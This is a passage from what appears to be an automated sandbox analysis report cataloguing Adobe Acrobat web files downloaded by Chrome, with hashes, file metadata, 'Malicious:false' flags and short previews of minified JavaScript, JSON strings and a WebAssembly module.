                                                      Preview:(()=>{var e,t,n={Faz6:(e,t,n)=>{"use strict";t.z=function A4uOpenIn(e){var t=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),o.default.createElement("path",{fillRule:"evenodd",d:"M33,2H3A1,1,0,0,0,2,3V17a1,1,0,0,0,1,1H5a1,1,0,0,0,1-1V6H30V30H19a1,1,0,0,0-1,1v2a1,1,0,0,0,1,1H33a1,1,0,0,0,1-1V3A1,1,0,0,0,33,2Z"}),o.default.createElement("path",{fillRule:"evenodd",d:"M18.63574,27.7644A.78433.78433,0,0,0,19.19629,28,.80333.80333,0,0,0,20,27.24573V16.49585A.4973.4973,0,0,0,19.50415,16H8.75439A.80288.80288,0,0,0,8,16.80371a.78548.78548,0,0,0,.23535.56055L12.02148,21.15,2.97891,30.19236a1,1,0,0,0,0,1.41422l1.41433,1.41434a1,1,0,0,0,1.41423,0l9.04215-9.04239Z"}))};var o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65417), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):779377
                                                      Entropy (8bit):5.605719093694398
                                                      Encrypted:false
                                                      SSDEEP:12288:LUqC2TXCP5b6zpApiuPK2Pr9Kt4SRQarGH83thBulzj:IqC2TXCP5bXaJa
                                                      MD5:61214D6F9495AC1755129A21205331EB
                                                      SHA1:18C260596AF6312B2ED340D0B0AF395CABEA2F57
                                                      SHA-256:A4CD039DA419BD244ADD77E4F50FE99E7BA0F432D003EDAC40AE7E827DA1A0F2
                                                      SHA-512:28552DCB00919904AC570AE36E8A8193CFB53A381634A387848EC2238BF9A0B6866A5FF65FDA08D3FE8D1046CF8057FA619433DA13246648BD81248DD608A824
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-send-dropin/3.22.1_6.298.0/bootstrap.js
                                                      Preview:(()=>{var e,n,i,t,o={CTXV:(e,n,i)=>{"use strict";i.d(n,{UB:()=>t});Object.freeze({LIGHT:"light",DARK:"dark"}),Object.freeze({DEFAULT_LIGHT:{color:"var(--spectrum-global-color-gray-800)",background:"transparent"},DEFAULT_DARK:{color:"var(--spectrum-global-color-gray-700)",background:"transparent"},HOVER:{color:"var(--spectrum-global-color-gray-900)",background:"transparent"},ACTIVE:{color:"var(--spectrum-global-color-gray-900)",background:"var(--spectrum-global-color-gray-300)"},SELECTED:{color:"var(--spectrum-global-color-gray-900)",background:"var(--spectrum-global-color-gray-300)"}});const t=Object.freeze({DELAY:"500",PLACEMENT:Object.freeze({TOP:"top",BOTTOM:"bottom",LEFT:"left",RIGHT:"right"})})},klCL:function(e,n,i){var t;!function(o,s){"use strict";var r="function",a="undefined",d="object",l="string",_="major",c="model",m="name",p="type",u="vendor",h="version",f="architecture",g="console",b="mobile",v="tablet",k="smarttv",w="wearable",y="embedded",P="Amazon",S="Apple",D="ASUS",z=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (10744)
                                                      Category:downloaded
                                                      Size (bytes):10812
                                                      Entropy (8bit):5.66549847365671
                                                      Encrypted:false
                                                      SSDEEP:192:D4w031d1804s97cF7ZEtg/IvcGIsO01ZA+qaBa9ylnVtNT1m1DZrMcETFu2F4csl:D4wC180L7cF7ZEtg/IyABa9yln7NxsDr
                                                      MD5:4376D8FE9C45E3D7F5FF5B13C685CA07
                                                      SHA1:4CE0C4ACCCCCC454E5EB2704D879F5B2E7C4C0C2
                                                      SHA-256:BFDB9999C1CA77FFA40EC459FDF843B3831F9D20029565ADFE935F97A16C9ED8
                                                      SHA-512:F13352BC302866E1DA2AA89767A87532CCCBACC768298B3345E8709D6ED5336E90C6508AE2E201CDDA4DB466E105B59BBEFE89E6AA4560111F6853DAA0776A8A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/home/006ad14344/libs/sentry/worker.min.js
                                                      Preview:/*! For license information please see worker.min.js.LICENSE.txt */.var t=Uint8Array,n=Uint16Array,r=Int32Array,e=new t([0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0,0,0,0]),i=new t([0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13,0,0]),a=new t([16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15]),s=function(Q,R){for(var V=new n(31),W=0;W<31;++W)V[W]=R+=1<<Q[W-1];var X=new r(V[30]);for(W=1;W<30;++W)for(var Y=V[W];Y<V[W+1];++Y)X[Y]=Y-V[W]<<5|W;return{b:V,r:X}},o=s(e,2),f=o.b,h=o.r;f[28]=258,h[258]=28;for(var l=s(i,0).r,u=new n(32768),c=0;c<32768;++c){var v=(43690&c)>>1|(21845&c)<<1;v=(61680&(v=(52428&v)>>2|(13107&v)<<2))>>4|(3855&v)<<4,u[c]=((65280&v)>>8|(255&v)<<8)>>1}var d=function(Q,R,V){for(var W=Q.length,X=0,Y=new n(R);X<W;++X)Q[X]&&++Y[Q[X]-1];var Z,$=new n(R);for(X=1;X<R;++X)$[X]=$[X-1]+Y[X-1]<<1;if(V){Z=new n(1<<R);var tt=15-R;for(X=0;X<W;++X)if(Q[X])for(var nt=X<<4|Q[X],rt=R-Q[X],et=$[Q[X]-1]++<<rt,it=et|(1<<rt)-1;et<=it;++et)Z[u[et]>>tt]=nt}else fo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):66384
                                                      Entropy (8bit):4.7806810800438555
                                                      Encrypted:false
                                                      SSDEEP:768:/TObaBVeryWyK6yAyRA4y8yMy+FdyfWZoyO8zyNgyZy5yX2S1yk8CIyKa158vvyU:/TIXo2x/CEmiXJIabWXoEzER
                                                      MD5:9E1B6F5717299A2F3DB918379C73F6A8
                                                      SHA1:32B9EFFFC4CB5423A030B901D6EAA5BFC3FB2E70
                                                      SHA-256:D4CBBCAE784B3B73233332BE23879146A1EBCCDBCD01A168E6C344FF6E1F4424
                                                      SHA-512:418B0619CA4DB531E74BB7D27E2B5F157AD0FF3F66B576FC8986319C1647999975334AE739BFB4EB60197020021D034FC054ED5CC2ECB31F2258874E7DA92D99
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/nextactionspanel-chunk.js
                                                      Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[5905],{"jm/q":(e,C,t)=>{"use strict";t.r(C),t.d(C,{NextActionsPanelContent:()=>w,autoOpenEnabled:()=>autoOpenEnabled,handleFillSignDataChanged:()=>handleFillSignDataChanged,maybeAutoOpenRHP:()=>maybeAutoOpenRHP,registerObservers:()=>registerObservers,rhpActionCallback:()=>rhpActionCallback,rhpCloseEvent:()=>rhpCloseEvent,rhpHistoryListener:()=>rhpHistoryListener,rhpOpenEvent:()=>rhpOpenEvent,rhpShownVerbsEvents:()=>rhpShownVerbsEvents,setRhpOpenTime:()=>setRhpOpenTime});var n=t("YWiy"),r=t("/hLX"),l=t.n(r),i=t("plsW"),o=t("Zm2D"),a=t("UpqL");const c=["locale","messages"];const wrapOriginalApp=e=>{const C=(0,o.injectIntl)(e);class Wrapped extends n.Component{constructor(){super(),this.setIntlProvider=this.setIntlProvider.bind(this)}setIntlProvider(e){e&&(this.intlProvider=e)}render(){const e=this.props,{locale:t,messages:r}=e,l=function _objectWithoutProperties(e,C){if(null==e)return{};var t,n,r=function _objectW
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):571
                                                      Entropy (8bit):4.868341244422001
                                                      Encrypted:false
                                                      SSDEEP:12:BmL+xY4QxpkiTjR5xc1gmPQCBlBy36aY1GVf01iwWArITvFcOYdldY:BmSx8xpTTtmPfa3DjArIbSbdc
                                                      MD5:9BC94F98F08D170FE39A07CFA208AFA3
                                                      SHA1:CC0BB53D6BED23AF4ADC99F236A1C23ED6DE6F57
                                                      SHA-256:A1519D47B6C39AD275663EF973CD9DB7953E0C2E0D78D94330F9DB152A51EA4F
                                                      SHA-512:52034FD99956B4691E0C7EE4E6D8752FF2159D449A27B55F7A2A46E2D8272DA3101E8BEF451F63C900A97347477DDEA746478E8143C4754AE3A51968B84342FB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/dictionary/en_US.json
                                                      Preview:{. "LOC_ALL_APPS": "All apps",. "PROFILE_SIGN_IN": "Sign in",. "PROFILE_SIGN_UP": "Sign up",. "GET_HELP": "Get help",. "CONTACT_US": "Contact us",. "APP_LAUNCHER_TOOLTIP": "App switcher",. "ASK_THE_COMMUNITY": "Ask the community",. "HELP_MENU_TOOLTIP": "Help",. "APP_SWITCHER_HEADER_TITLE": "Web Apps",. "APP_SWITCHER_ERROR": "Unable to load app switcher.",. "HELP_ERROR": "Unable to load help menu.",. "TRY_AGAIN": "Try again",. "LOC_HOME": "Home",. "MY_ADOBE": "My Adobe",. "DISMISS": "Dismiss",. "CART_TOOLTIP": "Cart".}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (7104)
                                                      Category:downloaded
                                                      Size (bytes):7158
                                                      Entropy (8bit):5.238454896108336
                                                      Encrypted:false
                                                      SSDEEP:192:vzlYPcPbYHznud1Csl1GWVhCX+1dZOfCYL/aINkq:6PMYHqMNVfCE/
                                                      MD5:41D64515D352D278C7188E75568731E5
                                                      SHA1:ACFB19E1553FFE9F1D9C492B4E1B61034F88012F
                                                      SHA-256:5AADC8132B41A7459DBA07763A5400BA4264AD18B34402E7D74BB910CD5CF026
                                                      SHA-512:16E37ECA09EB020F3E92F9B4E780F890216941A2F7235510B41B207281A3739C567F49BAEBAB6DB84008FB9DC7EFF86BCAE8335D80B60E204762F7C820BB4F2D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/3.46.1_6.219.0/ajsProvider-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-rendition"]=self["webpackJsonp-rendition"]||[]).push([[90],{gTnC:(e,t,a)=>{a.r(t),a.d(t,{default:()=>AcrobatJSProvider});var n=a("4PKp"),i=a("plsW"),r=a("0VNB"),s=a("6Wbc");class OrganizeApisManager{constructor(){this.validIntents=["organize-pdf","delete-pages","extract-pages","insert-pdf","reorder-pages","rotate-pages","number-pages"],this.intent=null,this.nonce=null}async validateIntent(e){if(!e||!this.validIntents.includes(e))throw new Error(s.Sg.INVALID_INTENT)}async organizeWillBegin(e){const{intent:t,fileUrl:a}=e;a||(e.fileUrl="localFileUrl");try{await this.validateIntent(t),this.intent=t}catch(e){throw e}}static getDcApiClientId(){let e="dc-local-virgoweb";return"prod"===i.envUtil.getHostEnv()?e="dc-prod-virgoweb":"stage"===i.envUtil.getHostEnv()?e="dc-stage-virgoweb":"dev"===i.envUtil.getHostEnv()&&(e="dc-dev-virgoweb"),e}async fetchToken(){const e=(await i.providers.dcapi()).getDcapi(),t=(0,r.v4)(),a=OrganizeApisManager.getDcApiClientId();try{v
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (7125)
                                                      Category:downloaded
                                                      Size (bytes):7181
                                                      Entropy (8bit):5.351995352618392
                                                      Encrypted:false
                                                      SSDEEP:192:Njj64TcUxxMxoGdXw1vzfGKbZA+MUZUpIOeTcLA:Njj64Q0xTOXmvze8A+ZZhoA
                                                      MD5:7021163427C922128FB0619A7DF876DB
                                                      SHA1:4B3F3637F6F7629FE79018E4F7E9611DD35FD1A8
                                                      SHA-256:4D7E4D4908C1D5A885DFE06D690B84F734A2B327AF1E70F15FCE2312620D59BC
                                                      SHA-512:0A3391098A7BE657E7A1B740237699F7E928429AA3ED33FB7554F696210FA0EC8CD630C924486CB52851B2CCEEED7705BA2F95F9FCE60B9A44FA01B92B51C10D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-files2-dropin/3.58.0_2.717.0/wp-dc-storage-chunk.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="750111f0-3d87-4630-a0bf-7d4b59ffe25a",e._sentryDebugIdIdentifier="sentry-dbid-750111f0-3d87-4630-a0bf-7d4b59ffe25a")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"b2aaa94a66520d673e9e90091d77d97c59bf9850"},(self["webpackJsonp-files2"]=self["webpackJsonp-files2"]||[]).push([[2732],{"0lZE":(e,t,i)=>{"use strict";i.d(t,{A:()=>n});const n=["onAssetUpdated"]},ZGl3:(e,t,i)=>{"use strict";i.r(t),i.d(t,{default:()=>c});var n=i("0VNB"),s=i.n(n),o=i("plsW"),r=i("H8In"),a=i("0lZE"),__awaiter=function(e,t,i,n){return new(i||(i=Promise))((function(s,o){function fulfilled(e){try{step(n.next(e))}catch(e){o(e)}}function rejected(e){try{step(n.throw(e))}catch(e){o(e)}}function step(e){e.d
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                      Category:downloaded
                                                      Size (bytes):4788808
                                                      Entropy (8bit):5.54349716546308
                                                      Encrypted:false
                                                      SSDEEP:24576:uhi1/VElrqrQMerTL/Rf9zkM+wkmAdbFtmAbbFdbFkmA0b9Rb9NbF+bF6bFGbFBk:qQHn
                                                      MD5:DDF38255CDE152277EB1E5CD7826706A
                                                      SHA1:751819D93C265B97C57AD35AF407F2225F22D0FB
                                                      SHA-256:BCF2687B03F6A5A7492AC109D19FCEB776883C7D9952708490544BC8B02C4AE3
                                                      SHA-512:80C37CC7B3CE3615CF8C6418EE06D1DA6832E131D6660CCA42BFA11A0D166397BDEBB6FC1606E404A6B313B1DBFE94317067F3D38CC7B7EF17615E07FE661C29
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/wasm_acrobat_we.5e6c0708a23e22d3898c3f89265618dc.part1.wasm
                                                      Preview:.asm.......dylink.0....H..]......`...`....`....`.....`.....`......`......`.......`.......`........`........`.........`..`.........`..........`..~.`...~`..........`...........`...`...}`..}.`..}..`..}}..`...~...`...........`...}..`....}.`............`..}...`..}...`.}.}`...~.`.}...`..}}}}..`....}`....~..`...}.`..~~~~.`.....}.`............`..~..~`.............`..~..`...~..`..~~..`.....~..`...~..`..............`..|.`...}..`.~...`.............`..}}..`..~.~`.}}.}`..~...`..}}.`......}.`..~...`..}..`...}}..`..}}}}}}..`.~~.~`..|`..|..`..~`...}.}`.|.}`.|..|`.}..`...}}}....`...}...`....~`......}}.`......~..`...............`.}.....`..~~.`......~`.....}`..}}}}}}}}...`...............`.................`..|......`.}..}`....~~..`....|..`.....~~..`.....|..`......~~..`.~..`...|`...|.|`..}}...`...}}}...`....~.~`..}}}}}}.`.~~~~..`..}}}.`..................`.....}..`........}}...`....}}}..`..~..~.`...}}}}}}}}...`....}}}}}}}}.`......}}....`...}}..`..~....`....||.....`.....~..`...}}.`..............}....`..}.}.}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (44509)
                                                      Category:downloaded
                                                      Size (bytes):44569
                                                      Entropy (8bit):5.270893243323715
                                                      Encrypted:false
                                                      SSDEEP:768:EEgTLePAtv6DS4iDITfvwDLVkIiwjt8wnAOnh5KND7iRLRwI8jIIRgDa0Y5ILeNF:ERy4tdfVkIiwBOLDmzkHp4Ec+m+Xg3tI
                                                      MD5:39BD11CBA89CFF42A1DBB0E443C5CD1C
                                                      SHA1:34F353FBDC9B31D5BB0C1718F0B457F986EC6DE7
                                                      SHA-256:6FBA877B14C857B35A81F11FA8AB2031FDBD315EEEF68FCDDDD50135BD12CAA2
                                                      SHA-512:C2277A20F4D6C45E9B2B9EA0E66D8B0B3469115F7C2E1EBFFE2A1DD2DD2A73B731D1CE7F024388636624ACCCDD98DD73579804E533C1B9EB72D68C00288D200E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-files-dropin/3.18.0_2.64.0/files-providers-chunk.js
                                                      Preview:(self["webpackJsonp-files"]=self["webpackJsonp-files"]||[]).push([[292,169],{"2Vei":(e,t,i)=>{"use strict";i.r(t),i.d(t,{default:()=>SelectionFactory});var n=i("abd3"),r=i("YWiy"),o=i("5InX"),s=i.n(o),a=i("s3V1"),l=i("plsW"),c=i("BCQY"),d=i("x6CA"),__decorate=function(e,t,i,n){var r,o=arguments.length,s=o<3?t:null===n?n=Object.getOwnPropertyDescriptor(t,i):n;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)s=Reflect.decorate(e,t,i,n);else for(var a=e.length-1;a>=0;a--)(r=e[a])&&(s=(o<3?r(s):o>3?r(t,i,s):r(t,i))||s);return o>3&&s&&Object.defineProperty(t,i,s),s},__awaiter=function(e,t,i,n){return new(i||(i=Promise))((function(r,o){function fulfilled(e){try{step(n.next(e))}catch(e){o(e)}}function rejected(e){try{step(n.throw(e))}catch(e){o(e)}}function step(e){e.done?r(e.value):function adopt(e){return e instanceof i?e:new i((function(t){t(e)}))}(e.value).then(fulfilled,rejected)}step((n=n.apply(e,t||[])).next())}))};const p=l.logging.getLogger("Selection"),isSharedItem=e
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):231677
                                                      Entropy (8bit):5.166887392599837
                                                      Encrypted:false
                                                      SSDEEP:1536:DWmi5ZY4hAbrmaGC7wB94k9Fcmi5ZY4hAbrmaGC7wB94h:iFZ
                                                      MD5:A9F5839341BA127507F123F9F9D1DE9E
                                                      SHA1:4390CD1533E83C6244356BC350015761C7E1339B
                                                      SHA-256:ED4B91C874C16E440708E9CD942DD4E8D76AE4AA26D3A3A16DD4095C2415C33B
                                                      SHA-512:447C7ABD1AEDC3D33489205C3F86F41D2E2AA647AFA6B212900482881A7A116334347AC4D843600CAD482C9D1F0E123AF8962CBCC7072A416BF9DC56DAD16530
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/AnimateCss-expandedPanelContainer-chunk.js
                                                      Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[4346],{Eh2O:(n,t,a)=>{"use strict";a.r(t),a.d(t,{default:()=>o});var e=a("NjQJ"),A=a.n(e),r=a("AXyZ"),i=a.n(r)()(A());i.push([n.id,"@charset \"UTF-8\";/*!\n * animate.css - https://animate.style/\n * Version - 4.1.1\n * Licensed under the MIT license - http://opensource.org/licenses/MIT\n *\n * Copyright (c) 2020 Animate.css\n */\n:root {\n --animate-duration: 1s;\n --animate-delay: 1s;\n --animate-repeat: 1;\n}\n.animate__animated {\n -webkit-animation-duration: 1s;\n animation-duration: 1s;\n -webkit-animation-duration: var(--animate-duration);\n animation-duration: var(--animate-duration);\n -webkit-animation-fill-mode: both;\n animation-fill-mode: both;\n}\n.animate__animated.animate__infinite {\n -webkit-animation-iteration-count: infinite;\n animation-iteration-count: infinite;\n}\n.animate__animated.animate__repeat-1 {\n -webkit-animation-iteration-count: 1;\n animation-iteration-count: 1;\n -
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):67356
                                                      Entropy (8bit):5.448052239853968
                                                      Encrypted:false
                                                      SSDEEP:1536:6RmsvZwmLNzXSOLzNEEDkNdtiBj5DSWdWy+W:ajX5K4FR/
                                                      MD5:F229AA3E668F92EFA5CBF53BF986F577
                                                      SHA1:A0FFEE86FABA8218AB5C94C8BD833030B2C08841
                                                      SHA-256:253DE6797359738AB8E6EFD01BEB82A4D2FF424BA05B58B32FBB51D95CF54AE7
                                                      SHA-512:BFC451E1E3705F6A6AE81F4FBA4CCD8C2EF6C50862053815823A7DD035F0031CB58729155156EC97BED0CA8D5418AAC2F364E7EEB55A01007EAE079B60A219D5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.582.0/progress-chunk.js
                                                      Preview:(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[192],{MWqy:(e,t,r)=>{"use strict";t.d=function A4uAlert(e){var t=_extends({},e);return s.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),s.default.createElement("path",{fillRule:"evenodd",d:"M17.127,2.579.4,32.512A1,1,0,0,0,1.272,34H34.728a1,1,0,0,0,.872-1.488L18.873,2.579A1,1,0,0,0,17.127,2.579ZM20,29.5a.5.5,0,0,1-.5.5h-3a.5.5,0,0,1-.5-.5v-3a.5.5,0,0,1,.5-.5h3a.5.5,0,0,1,.5.5Zm0-6a.5.5,0,0,1-.5.5h-3a.5.5,0,0,1-.5-.5v-12a.5.5,0,0,1,.5-.5h3a.5.5,0,0,1,.5.5Z"}))};var s=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var s in r)Object.prototype.hasOwnProperty.call(r,s)&&(e[s]=r[s])}return e},_extends.apply(this,arguments)}},DvDf:(e,t,r)=>{"use strict";t.F=function A4uCheckmarkCircleOutline(e){var t=_extends({},e);return s.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):181158
                                                      Entropy (8bit):5.505572821643911
                                                      Encrypted:false
                                                      SSDEEP:3072:81admoPom/d+1kEd/KFIfSoVyHNb6p1bVCbiBbtlbU82bwqb96bZvbjAbgfYT:VPoUd+/KFIaoVyHNbO1bVCbiBbtlbUVJ
                                                      MD5:98BB518D10C507A2FB73827DD23BA898
                                                      SHA1:D0E784FA50FE5ED0DDFB29752997C5C5F0BB0890
                                                      SHA-256:F76D451A0EB6A04CA12D871A5E69489D0BFDBD35DE6FD78D24BD9C7B9AAA009A
                                                      SHA-512:417336EFAB55E11D3D589B0C2922BC1B77D1F3907E3C100672CC12070201923F67ADA9227B8745B768B81CD7FDE0160CF2A01A8D758E7EED1949C7E783FEA90E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.682.0/bootstrap.js
                                                      Preview:(()=>{var e,t,r,i,o={Xoby:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default={workflows:{acrobat:"acrobat"},subcategories:{express:"express",scToAcp:"sc-to-acp",transformPdf:"transform-pdf"},types:{agreementDraft:"agreement-draft",agreementDraftIncluded:"agreement-draft-included",cancelDialog:"cancel-dialog",ccxJob:"ccx-job",complete:"complete",compressRetry:"compress-retry",confirmSave:"confirm-save",continueDialog:"continue-dialog",discover:"discover",documentOrganizer:"document-organizer",documentRendition:"document-rendition",downloadAsset:"download-asset",dropzone:"dropzone",entry:"entry",error:"error",express:"express",fileNotSupported:"file-not-supported",filepicker:"filepicker",filesDropped:"files-dropped",filesProcessed:"files-processed",filesSelected:"files-selected",gotoApp:"goto-app",importSelection:"import-selection",importToAcp:"import-to-acp",importViewer:"import-viewer",job:"job",landing:"landing",navAway:"nav-away-dialog",navBar:"nav-bar",n
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):308628
                                                      Entropy (8bit):5.937713857872096
                                                      Encrypted:false
                                                      SSDEEP:3072:XP6EB5zjZoZSF1iouo4Q+jnZig3aH74Bz5nka1rYA:XP6yOrouo4QY8vsTnz1r3
                                                      MD5:9F76C6E67C085F9D8608755DBA6EBD69
                                                      SHA1:CBA8A2F1890DFB0339A1927683714120DD48375A
                                                      SHA-256:EB51BDEDEF6A7F832A8E1F72BB19313593AB505B38EB1DA95E111E1576C31E40
                                                      SHA-512:E420BDE812D7F43FF13EEF6ABA219BE4C719E03B4D3D15ED1F5050DD84B7023F116372EF14A0CB5591675E887631BEA24886EC2AB459432279E8C019D972F5CF
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/expandedPanelContainer-chunk.js
                                                      Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[9855],{zqs0:(e,t,n)=>{"use strict";var o=n("AAps");Object.defineProperty(t,"nD",{enumerable:!0,get:function get(){return i.default}}),Object.defineProperty(t,"As",{enumerable:!0,get:function get(){return s.default}});var i=o(n("PeQZ")),s=o(n("cKam"))},PeQZ:(e,t,n)=>{"use strict";var o=n("AAps"),i=n("h6PR");Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s,r,a,l=o(n("z3HK")),d=o(n("jp00")),m=o(n("2Xkx")),c=o(n("QNma")),p=o(n("vPca")),A=o(n("khqL")),u=o(n("qavZ")),C=o(n("qJYQ")),h=o(n("i44B")),g=o(n("PZ3W")),B=o(n("uT4t")),f=o(n("e1tA")),v=o(n("vEgD")),b=o(n("/hLX")),E=i(n("YWiy"));n("pwD8"),n("poDw"),n("h3RU");var y=(0,B.default)((a=r=function(e){function Accordion(e){var t;(0,c.default)(this,Accordion),t=(0,A.default)(this,(0,u.default)(Accordion).call(this,e));var n=e.selectedIndex,o=e.defaultSelectedIndex,i=void 0!==n?n:o;return t.state={selectedIndex:t.normalizeSelectedIndex(i)},t}return(0
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (23436), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):23499
                                                      Entropy (8bit):4.838422113526679
                                                      Encrypted:false
                                                      SSDEEP:384:rgRjO8HtnPrs1oQLDrU5aZCrmjIpdjMAnOoVrkJbXcaHJ4wxbvoa9HW+YNeLXt+p:r0iKtAvDaKqmjIFkJbXcYxbv57to
                                                      MD5:DDEDC741F04A5F692A4900F4DEF23207
                                                      SHA1:3467142C70992C4520FF889DAB72589CF0DFF859
                                                      SHA-256:CC5006DAB259DB3E143BFCE80AB469B767905B1331F579E14E83DC9D4C81F55F
                                                      SHA-512:89AC7AE53FDC1A2D6B749760A031DF04237F38661ECA9F36E1F547DA8393C35D09CF058544CACCC818109CB271AA25B82A285C1688DDF4355F2ED70DBF18728B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/translations5-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[4264],{t39f:e=>{e.exports=JSON.parse('{"encodedContent.highlightedText":"Highlighted text","encodedContent.freehighlightedText":"Highlight","encodedContent.struckOutText":"Crossed out text","encodedContent.underlinedText":"Underlined text","encodedContent.pageLevelComment":"Page level comment","encodedContent.defaultNote":"Typed a note","encodedContent.defaultShape":"Added a drawing","encodedContent.defaultFreeText":"Added a typewriter text","encodedContent.defaultUnsupported":"Add a comment...","encodedContent.defaultReplace":"Replace selected text","encodedContent.defaultInsert":"Insert Text","notInDoc":"Not in Doc","inviteWarnMsg":"Anyone you @mention will be invited to comment on this file","accessWarnMsg":"Anyone @mentioned will need access to this document to see or reply to your comment.","invite":"Invite to this document","redhawkCommentSaveError":"We were unable to post your comment, please t
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (10263)
                                                      Category:downloaded
                                                      Size (bytes):10312
                                                      Entropy (8bit):5.608511162321684
                                                      Encrypted:false
                                                      SSDEEP:192:rhb9xzmmg5pbyp4fcT6VpeeJUCx2ZPEXOkiQNjXv6bWyLqCi3VbSGBc4qUFGwn+Q:rhbztAET6VpZx26KoL6bWyLqCwFBrT0Q
                                                      MD5:A143591ABAE58DD89C63EB8DBA3836DB
                                                      SHA1:A6208930A27D700443DB9A0B1460ECC3B418E153
                                                      SHA-256:2E5EB102A1190602E4176D2477552DC8A50A2F3D8788070F03F4B282FE17B8BD
                                                      SHA-512:3867D6B4D069629AD558AC03983BB3F6D38B07B100DBF8ECDC66FA385E5FCF4A0D9A380E4AF51CF94930F4030DAD85BB28859776091AE687FFD56C9EC608B592
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/9061-chunk.js
